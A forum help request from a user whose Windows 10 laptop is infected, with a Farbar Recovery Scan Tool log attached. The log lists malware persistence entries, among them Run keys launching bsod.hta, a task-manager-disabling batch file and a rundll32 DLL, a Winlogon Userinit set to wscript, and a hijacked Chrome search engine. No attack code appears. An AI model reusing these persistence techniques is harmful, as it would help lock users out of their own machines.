Hello! Until recently I've been able to combat any and all infections I've gotten, but this one is on another level!! I have run every piece of anti-malware out there but haven't been able to get back to 100%. I'm now not able to have a desktop when the computer loads, just a black screen, which I can only get past by pressing CTRL+ALT+DEL, running Task Manager, then File -> Run -> explorer.exe. This reloads my desktop, but the virus has added group policies which disable me as an admin. I also see a wsdscript.exe that is running in the background which I cannot get rid of because of the group policy (same with Windows Defender). Any help would be much appreciated.
Below is my FRST64 log, and the 'addition' file that appeared when I ran the scan.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (08-04-2016 10:28:19)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Emsisoft Ltd) C:\Program Files\Emsisoft Anti-Malware\a2service.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\mmc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [emsisoft anti-malware] => c:\program files\emsisoft anti-malware\a2guard.exe [9402680 2016-03-24] (Emsisoft Ltd)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe" -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [Rt562@] => C:\WINDOWS\Disable task manager .bat
HKLM-x32\...\Run: [QwaT] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rty01] => C:\WINDOWS\call.vbs
HKLM-x32\...\Run: [TV] => C:\WINDOWS\TV
HKLM-x32\...\Run: [QwaT78] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT21] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rt45] => C:\WINDOWS\auto explore.bat
HKLM-x32\...\Run: [QwaT55] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT22] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaTgg] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT5] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT4] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT1] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [BSOD] => C:\WINDOWS\bsod.hta
HKLM-x32\...\Run: [rst] => C:\WINDOWS\rst.bat
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat [134 2016-04-07] () <===== ATTENTION
HKLM\...\Winlogon: [Userinit] wscript,
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [wdbext] => rundll32.exe "C:\Users\RoNiN\AppData\Local\wdbext.dll",wdbext <===== ATTENTION
AppInit_DLLs: C:\ProgramData\AppxikenoZ\Volity.dll => No File
AppInit_DLLs-x32: C:\ProgramData\AppxikenoZ\Goldenphase.dll => No File
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {A2516833-3348-406A-96A6-26AAA93BF9DE} URL =
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {A2516833-3348-406A-96A6-26AAA93BF9DE} URL =
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL =
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-01-13]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-03-22]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-07]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-03-02]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-07]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-15]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
